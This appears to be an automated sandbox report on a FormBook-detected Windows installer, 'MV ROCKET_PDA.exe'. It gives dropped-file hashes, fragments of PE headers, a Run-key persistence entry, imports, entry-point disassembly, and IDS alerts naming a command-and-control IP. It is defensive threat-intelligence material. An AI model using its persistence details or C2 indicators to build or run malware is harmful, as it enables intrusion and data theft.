                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                          Simulations

                                                                                          Behavior and APIs

                                                                                          TimeTypeDescription
                                                                                          10:03:40AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run O0H8GLDXC6X C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe
                                                                                          10:03:48AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run O0H8GLDXC6X C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe

                                                                                          Joe Sandbox View / Context

                                                                                          IPs

                                                                                          No context

                                                                                          Domains

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                          HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.comLv9eznkydx.exeGet hashmaliciousBrowse
                                                                                          • 3.223.115.185
                                                                                          RNIpSzBRVC.exeGet hashmaliciousBrowse
                                                                                          • 3.223.115.185
                                                                                          2WK7SGkGVZ.exeGet hashmaliciousBrowse
                                                                                          • 3.223.115.185
                                                                                          Nueva orden de investigaci#U00f3n de Desppo.exeGet hashmaliciousBrowse
                                                                                          • 3.223.115.185
                                                                                          FanCourier54488203expediere doc202177.exeGet hashmaliciousBrowse
                                                                                          • 3.223.115.185
                                                                                          Swift Copy.exeGet hashmaliciousBrowse
                                                                                          • 3.223.115.185
                                                                                          DOCS-0094-LPO.exeGet hashmaliciousBrowse
                                                                                          • 3.223.115.185
                                                                                          Cost Inquiry.exeGet hashmaliciousBrowse
                                                                                          • 3.223.115.185
                                                                                          pdrAizaO1R.exeGet hashmaliciousBrowse
                                                                                          • 3.223.115.185
                                                                                          TTAP_OPEN_ORDEROCT2021.xlsxGet hashmaliciousBrowse
                                                                                          • 3.223.115.185
                                                                                          Order Kllc022376.exeGet hashmaliciousBrowse
                                                                                          • 3.223.115.185
                                                                                          jnnbbMX9Ch.exeGet hashmaliciousBrowse
                                                                                          • 3.223.115.185
                                                                                          vbc.exeGet hashmaliciousBrowse
                                                                                          • 3.223.115.185
                                                                                          1234.dllGet hashmaliciousBrowse
                                                                                          • 3.223.115.185
                                                                                          Document.exeGet hashmaliciousBrowse
                                                                                          • 3.223.115.185
                                                                                          HPMT ORDER LIST.exeGet hashmaliciousBrowse
                                                                                          • 3.223.115.185
                                                                                          CpUNO6WMEm.exeGet hashmaliciousBrowse
                                                                                          • 3.223.115.185
                                                                                          Doc (BL, inv & packing list).exeGet hashmaliciousBrowse
                                                                                          • 3.223.115.185
                                                                                          BERN210819.exeGet hashmaliciousBrowse
                                                                                          • 3.223.115.185
                                                                                          iRv.exeGet hashmaliciousBrowse
                                                                                          • 3.223.115.185
                                                                                          shops.myshopify.coms0JV4f4mDk.exeGet hashmaliciousBrowse
                                                                                          • 23.227.38.74
                                                                                          detalles del pedido.exeGet hashmaliciousBrowse
                                                                                          • 23.227.38.74
                                                                                          8VNALsC90G.exeGet hashmaliciousBrowse
                                                                                          • 23.227.38.74
                                                                                          hwIILTIn0n.exeGet hashmaliciousBrowse
                                                                                          • 23.227.38.74
                                                                                          PkF9Fg2Tnc.exeGet hashmaliciousBrowse
                                                                                          • 23.227.38.74
                                                                                          OgafwBF6eV.exeGet hashmaliciousBrowse
                                                                                          • 23.227.38.74
                                                                                          VC-Q-1056410-21GR1.exeGet hashmaliciousBrowse
                                                                                          • 23.227.38.74
                                                                                          BYSM-207 SC TRIFTECH78574543957Baku.exeGet hashmaliciousBrowse
                                                                                          • 23.227.38.74
                                                                                          FanCourier54488203expediere doc202177.exeGet hashmaliciousBrowse
                                                                                          • 23.227.38.74
                                                                                          Swift Copy.exeGet hashmaliciousBrowse
                                                                                          • 23.227.38.74
                                                                                          F4BnzY4lp8.exeGet hashmaliciousBrowse
                                                                                          • 23.227.38.74
                                                                                          solicitud de presupuesto.exeGet hashmaliciousBrowse
                                                                                          • 23.227.38.74
                                                                                          bank statement 001.pdf.exeGet hashmaliciousBrowse
                                                                                          • 23.227.38.74
                                                                                          UwwOF5CGBp.exeGet hashmaliciousBrowse
                                                                                          • 23.227.38.74
                                                                                          Purchase Order.exeGet hashmaliciousBrowse
                                                                                          • 23.227.38.74
                                                                                          PO#006566.pdf.exeGet hashmaliciousBrowse
                                                                                          • 23.227.38.74
                                                                                          Angebotsanfrage 86548.exeGet hashmaliciousBrowse
                                                                                          • 23.227.38.74
                                                                                          oHdx7w2YXC.exeGet hashmaliciousBrowse
                                                                                          • 23.227.38.74
                                                                                          PO 9K10012021FP001.xlsxGet hashmaliciousBrowse
                                                                                          • 23.227.38.74
                                                                                          7wrbIuHmx6.exeGet hashmaliciousBrowse
                                                                                          • 23.227.38.74

                                                                                          ASN

                                                                                          No context

                                                                                          JA3 Fingerprints

                                                                                          No context

                                                                                          Dropped Files

                                                                                          No context

                                                                                          Created / dropped Files

                                                                                          C:\Users\user\AppData\Local\Temp\DB1
                                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.792852251086831
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                          MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                          SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                          SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                          SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          C:\Users\user\AppData\Local\Temp\Gw4n\5jsdph8p9l_r.exe
                                                                                          Process:C:\Windows\explorer.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                          Category:dropped
                                                                                          Size (bytes):257790
                                                                                          Entropy (8bit):7.906659979284372
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:F8LxBsoiasdxJ2BaggnRNlMman37oLSJDy5i5ZJFSwb:/1JUaggRNloBJD5Z7Swb
                                                                                          MD5:754D58F597C5947D64269AD73F3E38FE
                                                                                          SHA1:ABD09F3ED17E77B7DFF4A57E465D8D79AF7AB9EA
                                                                                          SHA-256:86AAB91018B32A9EE913459090B66FE44F00E625F05560483547AD39D542A61B
                                                                                          SHA-512:8E37800C185353C54E319DF915DD60848D634AA511DA5CABA24E35552B6877BDF76F119DCFC5AF6ADC8C0E655223945E418B2A9F2962E915F4D0954A4F2465FD
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          Reputation:unknown
                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.*^...QF..QG.qQF.*^...QF.rv..QF..W@..QF.Rich.QF.........PE..L...m:.V.................`..........*1.......p....@.........................................................................$u.......p...............................................................................p..|............................text...f^.......`.................. ..`.rdata.......p.......d..............@..@.data....]...........x..............@....ndata...................................rsrc........p.......~..............@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                                          C:\Users\user\AppData\Local\Temp\nsfEE22.tmp\lqnx.dll
                                                                                          Process:C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):16384
                                                                                          Entropy (8bit):6.642976494698868
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:AG59wWxQpKe3mDrkPVAkix7uKmlh98AMkj6hJuRlGwe7BEc/wVEJGagX0qj:tF3kdAkGaKmlh9zMJuT/e7BEc/wVauz
                                                                                          MD5:42BF28719C7A281F25F416419E8EB29C
                                                                                          SHA1:32E3D1A8A6BD3C8C021D912B3B40BB7F6873E070
                                                                                          SHA-256:FC8523037036ACC42499FF4DF39EDF888244A95CDE1F35C6A9C556BDB23AF035
                                                                                          SHA-512:65255E7F24A12704DC9646A8D5D36A0ACE0040AE852E142D4E8AA3C1B2ADF77FD7235F69665A661BB130267B6480077B0185DDB00A59E8B99AA66848B362478F
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          Reputation:unknown
                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Ka.....N...N...N...N...N...N...N.k.O...N.k.O...N...N*..N.^.O...N.^.O...N.^#N...N.^.O...NRich...N........................PE..L...._a...........!.........&...............0............................................@..........................A..H....D.......p..........................$....A..T............................................@...............................text............................... ..`.bss.........0...........................rdata..,....@......................@..@.data...D....P.......$..............@....rsrc........p.......<..............@..@.reloc..$............>..............@..B........................................................................................................................................................................................................................................................................
                                                                                          C:\Users\user\AppData\Local\Temp\nsk8EF9.tmp\lqnx.dll
                                                                                          Process:C:\Users\user\Desktop\MV ROCKET_PDA.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):16384
                                                                                          Entropy (8bit):6.642976494698868
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:AG59wWxQpKe3mDrkPVAkix7uKmlh98AMkj6hJuRlGwe7BEc/wVEJGagX0qj:tF3kdAkGaKmlh9zMJuT/e7BEc/wVauz
                                                                                          MD5:42BF28719C7A281F25F416419E8EB29C
                                                                                          SHA1:32E3D1A8A6BD3C8C021D912B3B40BB7F6873E070
                                                                                          SHA-256:FC8523037036ACC42499FF4DF39EDF888244A95CDE1F35C6A9C556BDB23AF035
                                                                                          SHA-512:65255E7F24A12704DC9646A8D5D36A0ACE0040AE852E142D4E8AA3C1B2ADF77FD7235F69665A661BB130267B6480077B0185DDB00A59E8B99AA66848B362478F
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          Reputation:unknown
                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Ka.....N...N...N...N...N...N...N.k.O...N.k.O...N...N*..N.^.O...N.^.O...N.^#N...N.^.O...NRich...N........................PE..L...._a...........!.........&...............0............................................@..........................A..H....D.......p..........................$....A..T............................................@...............................text............................... ..`.bss.........0...........................rdata..,....@......................@..@.data...D....P.......$..............@....rsrc........p.......<..............@..@.reloc..$............>..............@..B........................................................................................................................................................................................................................................................................
                                                                                          C:\Users\user\AppData\Local\Temp\nsv161C.tmp\lqnx.dll
                                                                                          Process:C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):16384
                                                                                          Entropy (8bit):6.642976494698868
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:AG59wWxQpKe3mDrkPVAkix7uKmlh98AMkj6hJuRlGwe7BEc/wVEJGagX0qj:tF3kdAkGaKmlh9zMJuT/e7BEc/wVauz
                                                                                          MD5:42BF28719C7A281F25F416419E8EB29C
                                                                                          SHA1:32E3D1A8A6BD3C8C021D912B3B40BB7F6873E070
                                                                                          SHA-256:FC8523037036ACC42499FF4DF39EDF888244A95CDE1F35C6A9C556BDB23AF035
                                                                                          SHA-512:65255E7F24A12704DC9646A8D5D36A0ACE0040AE852E142D4E8AA3C1B2ADF77FD7235F69665A661BB130267B6480077B0185DDB00A59E8B99AA66848B362478F
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          Reputation:unknown
                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Ka.....N...N...N...N...N...N...N.k.O...N.k.O...N...N*..N.^.O...N.^.O...N.^#N...N.^.O...NRich...N........................PE..L...._a...........!.........&...............0............................................@..........................A..H....D.......p..........................$....A..T............................................@...............................text............................... ..`.bss.........0...........................rdata..,....@......................@..@.data...D....P.......$..............@....rsrc........p.......<..............@..@.reloc..$............>..............@..B........................................................................................................................................................................................................................................................................
                                                                                          C:\Users\user\AppData\Local\Temp\nsy35E9.tmp\lqnx.dll
                                                                                          Process:C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):16384
                                                                                          Entropy (8bit):6.642976494698868
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:AG59wWxQpKe3mDrkPVAkix7uKmlh98AMkj6hJuRlGwe7BEc/wVEJGagX0qj:tF3kdAkGaKmlh9zMJuT/e7BEc/wVauz
                                                                                          MD5:42BF28719C7A281F25F416419E8EB29C
                                                                                          SHA1:32E3D1A8A6BD3C8C021D912B3B40BB7F6873E070
                                                                                          SHA-256:FC8523037036ACC42499FF4DF39EDF888244A95CDE1F35C6A9C556BDB23AF035
                                                                                          SHA-512:65255E7F24A12704DC9646A8D5D36A0ACE0040AE852E142D4E8AA3C1B2ADF77FD7235F69665A661BB130267B6480077B0185DDB00A59E8B99AA66848B362478F
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          Reputation:unknown
                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Ka.....N...N...N...N...N...N...N.k.O...N.k.O...N...N*..N.^.O...N.^.O...N.^#N...N.^.O...NRich...N........................PE..L...._a...........!.........&...............0............................................@..........................A..H....D.......p..........................$....A..T............................................@...............................text............................... ..`.bss.........0...........................rdata..,....@......................@..@.data...D....P.......$..............@....rsrc........p.......<..............@..@.reloc..$............>..............@..B........................................................................................................................................................................................................................................................................
                                                                                          C:\Users\user\AppData\Local\Temp\vjfcc7t80uolrv7
                                                                                          Process:C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):215823
                                                                                          Entropy (8bit):7.993271223129601
                                                                                          Encrypted:true
                                                                                          SSDEEP:6144:5225+ROciv/xkb6A7oLZ8LlylVi5ZJFS0:g8+YZk21aylWZ7S0
                                                                                          MD5:9E45C94CC6102F2332192E1AB3CF4969
                                                                                          SHA1:DF033E33AAEFE19A5E8BFB1FE768813A2C69D453
                                                                                          SHA-256:1E64FC2B7460F978ECD07A3A50F08FAAD709857F200AE2F9E419EA62DDA53FFD
                                                                                          SHA-512:D0914918646D4C5AD6A934EB11B52C6D610BD868386828972A2BA441B4EA9F9ADCD3EF5E25A8F95067C12E12A6F0FCC32340BE8CBE796C6A152F8B0DA855F277
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview: .g....J.......7.*?....).,....M.?..........W.p.)(..eP....+...!...wlw.r.)..]....K..3G....Le.....jbB....L..#YFj\...>........b.|....4sX]q.......@h.._.\.......G.....6.Be..p...........(..$..'.o.5v.~...d...cB.....q.....F.].O!.j.....D}..(..l[.&`..06.._.Q...zj).J.8R../..oD....UV./K.....M....m........W.p.)(..eP....+....K.X...3.b.......S.aq .....d...9....7.[.HD....l#..........b.w.^.^H._......v?..c.V.........Li. R[3. .?......7G.i...VrZ.....'.v5K.~...dV.....%..........F.]L..j@.....}......[.&"...6.._.Q...~j).J.0I..Q..oD..,.d./]....M.?..........W.p.)(..eP....+....K.X...3.b.......S.aq .....d...9....7.[.HD....l#..........b.w.^.^H._......v?..c.V.........Li. R[3. .?...............(..X....v5v.~...dV.....%....q.....F.]L..j@.....}......[.&"...6.._.Q...~j).J.0I..Q..oD..,.d./]....M.?..........W.p.)(..eP....+....K.X...3.b.......S.aq .....d...9....7.[.HD....l#..........b.w.^.^H._......v?..c.V.........Li. R[3. .?...............(..X....v5v.~...dV.....%....q.....F.]L..j@..
                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms
                                                                                          Process:C:\Windows\explorer.exe
                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Read-Only, Directory, ctime=Wed Apr 11 22:38:20 2018, mtime=Fri Oct 8 16:03:38 2021, atime=Fri Oct 8 16:03:37 2021, length=8192, window=hide
                                                                                          Category:modified
                                                                                          Size (bytes):7967
                                                                                          Entropy (8bit):3.7173959307957256
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:8CkbbY4bGtvbbcWCGdRTd2h/ME0IbGY4bGtvbbcWCGdRTd2s/A:8OPl5dOMIPl5d3A
                                                                                          MD5:F4BDBD1326FECA67B606A35E93670F6F
                                                                                          SHA1:C3ED963E446A23A21DFC739989597D0B488672EF
                                                                                          SHA-256:A319C09445CEC64E87306A01CB62FA8D3EB0E2A88FA3880A8CC04A58CCDB70AE
                                                                                          SHA-512:9957515CD1C51DCEB83EDD2C14C9D8B5F68B4E4CA15DD5E81825C1DE480790924E9F63104614C477D692A41C2D509B5D0FD7574B8CDE87AD0AA4AB0B09F90AD6
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview: L..................F...........,....R..of...#..of.... ...........................P.O. .:i.....+00.../C:\.....................1.....HSs...PROGRA~2.........L.HSs.....................V.........P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.......E...............-.......D.............H.....C:\Program Files (x86)..`.......X.......computer..!a..%.H.VZAj....."mY(........-..!a..%.H.VZAj....."mY(........-.r.......-...1SPSU(L.y.9K....-........................9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ........................H.B................. ..Qv.F.!a..%.H.VZAj....."mY(........-..!a..%.H.VZAj....."mY(........-.767668.....................?...of.........................C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.G.w.4.n.....G....Y...!a..%.H.VZAj....."mY(........-..!a..%.H.VZAj....."mY(........-.767668.....................?..of.........................C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)......^8.BoQ..!a..%.H.VZAj...2.4...........-..!

                                                                                          Static File Info

                                                                                          General

                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                          Entropy (8bit):7.906659979284372
                                                                                          TrID:
                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                          File name:MV ROCKET_PDA.exe
                                                                                          File size:257790
                                                                                          MD5:754d58f597c5947d64269ad73f3e38fe
                                                                                          SHA1:abd09f3ed17e77b7dff4a57e465d8d79af7ab9ea
                                                                                          SHA256:86aab91018b32a9ee913459090b66fe44f00e625f05560483547ad39d542a61b
                                                                                          SHA512:8e37800c185353c54e319df915dd60848d634aa511da5caba24e35552b6877bdf76f119dcfc5af6adc8c0e655223945e418b2a9f2962e915f4d0954a4f2465fd
                                                                                          SSDEEP:6144:F8LxBsoiasdxJ2BaggnRNlMman37oLSJDy5i5ZJFSwb:/1JUaggRNloBJD5Z7Swb
                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.*^...QF..QG.qQF.*^...QF..rv..QF..W@..QF.Rich.QF.........PE..L...m:.V.................`..........*1.......p....@

                                                                                          File Icon

                                                                                          Icon Hash:b2a88c96b2ca6a72

                                                                                          Static PE Info

                                                                                          General

                                                                                          Entrypoint:0x40312a
                                                                                          Entrypoint Section:.text
                                                                                          Digitally signed:false
                                                                                          Imagebase:0x400000
                                                                                          Subsystem:windows gui
                                                                                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                          Time Stamp:0x56FF3A6D [Sat Apr 2 03:20:13 2016 UTC]
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:
                                                                                          OS Version Major:4
                                                                                          OS Version Minor:0
                                                                                          File Version Major:4
                                                                                          File Version Minor:0
                                                                                          Subsystem Version Major:4
                                                                                          Subsystem Version Minor:0
                                                                                          Import Hash:b76363e9cb88bf9390860da8e50999d2

                                                                                          Entrypoint Preview

                                                                                          Instruction
                                                                                          sub esp, 00000184h
                                                                                          push ebx
                                                                                          push ebp
                                                                                          push esi
                                                                                          push edi
                                                                                          xor ebx, ebx
                                                                                          push 00008001h
                                                                                          mov dword ptr [esp+20h], ebx
                                                                                          mov dword ptr [esp+14h], 00409168h
                                                                                          mov dword ptr [esp+1Ch], ebx
                                                                                          mov byte ptr [esp+18h], 00000020h
                                                                                          call dword ptr [004070B0h]
                                                                                          call dword ptr [004070ACh]
                                                                                          cmp ax, 00000006h
                                                                                          je 00007F3EF12E69B3h
                                                                                          push ebx
                                                                                          call 00007F3EF12E9794h
                                                                                          cmp eax, ebx
                                                                                          je 00007F3EF12E69A9h
                                                                                          push 00000C00h
                                                                                          call eax
                                                                                          mov esi, 00407280h
                                                                                          push esi
                                                                                          call 00007F3EF12E9710h
                                                                                          push esi
                                                                                          call dword ptr [00407108h]
                                                                                          lea esi, dword ptr [esi+eax+01h]
                                                                                          cmp byte ptr [esi], bl
                                                                                          jne 00007F3EF12E698Dh
                                                                                          push 0000000Dh
                                                                                          call 00007F3EF12E9768h
                                                                                          push 0000000Bh
                                                                                          call 00007F3EF12E9761h
                                                                                          mov dword ptr [0042EC24h], eax
                                                                                          call dword ptr [00407038h]
                                                                                          push ebx
                                                                                          call dword ptr [0040726Ch]
                                                                                          mov dword ptr [0042ECD8h], eax
                                                                                          push ebx
                                                                                          lea eax, dword ptr [esp+38h]
                                                                                          push 00000160h
                                                                                          push eax
                                                                                          push ebx
                                                                                          push 00429058h
                                                                                          call dword ptr [0040715Ch]
                                                                                          push 0040915Ch
                                                                                          push 0042E420h
                                                                                          call 00007F3EF12E9394h
                                                                                          call dword ptr [0040710Ch]
                                                                                          mov ebp, 00434000h
                                                                                          push eax
                                                                                          push ebp
                                                                                          call 00007F3EF12E9382h
                                                                                          push ebx
                                                                                          call dword ptr [00407144h]

                                                                                          Rich Headers

                                                                                          Programming Language:
                                                                                          • [EXP] VC++ 6.0 SP5 build 8804

                                                                                          Data Directories

                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x75240xa0.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x370000x9e0.rsrc
                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x70000x27c.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                          Sections

                                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                          .text0x10000x5e660x6000False0.670572916667data6.44065573436IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                          .rdata0x70000x12a20x1400False0.4455078125data5.0583287871IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                          .data0x90000x25d180x600False0.458984375data4.18773476617IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                          .ndata0x2f0000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                          .rsrc0x370000x9e00xa00False0.45390625data4.4968702957IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                          Resources

                                                                                          NameRVASizeTypeLanguageCountry
                                                                                          RT_ICON0x371900x2e8dataEnglishUnited States
                                                                                          RT_DIALOG0x374780x100dataEnglishUnited States
                                                                                          RT_DIALOG0x375780x11cdataEnglishUnited States
                                                                                          RT_DIALOG0x376980x60dataEnglishUnited States
                                                                                          RT_GROUP_ICON0x376f80x14dataEnglishUnited States
                                                                                          RT_MANIFEST0x377100x2ccXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                                          Imports

                                                                                          DLLImport
                                                                                          KERNEL32.dllGetTickCount, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, SetFileAttributesA, CompareFileTime, SearchPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, GetTempPathA, Sleep, lstrcmpiA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrcatA, GetSystemDirectoryA, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, lstrlenA, GetCommandLineA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, MultiByteToWideChar, LoadLibraryExA, GetModuleHandleA, FreeLibrary
                                                                                          USER32.dllSetCursor, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, EndDialog, ScreenToClient, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, GetWindowLongA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, SetTimer, PostQuitMessage, SetWindowLongA, SendMessageTimeoutA, LoadImageA, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, CreateDialogParamA, DestroyWindow, ShowWindow, SetWindowTextA
                                                                                          GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                          SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteA
                                                                                          ADVAPI32.dllRegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                                                          COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                          ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                                                          Possible Origin

                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                          EnglishUnited States

                                                                                          Network Behavior

                                                                                          Snort IDS Alerts

                                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                          10/08/21-10:00:41.933472ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.38.8.8.8
                                                                                          10/08/21-10:01:04.086031UDP254DNS SPOOF query response with TTL of 1 min. and no authority53585408.8.8.8192.168.2.3
                                                                                          10/08/21-10:01:04.231593TCP2031453ET TROJAN FormBook CnC Checkin (GET)4982980192.168.2.3208.91.197.91
                                                                                          10/08/21-10:01:04.231593TCP2031449ET TROJAN FormBook CnC Checkin (GET)4982980192.168.2.3208.91.197.91
                                                                                          10/08/21-10:01:04.231593TCP2031412ET TROJAN FormBook CnC Checkin (GET)4982980192.168.2.3208.91.197.91
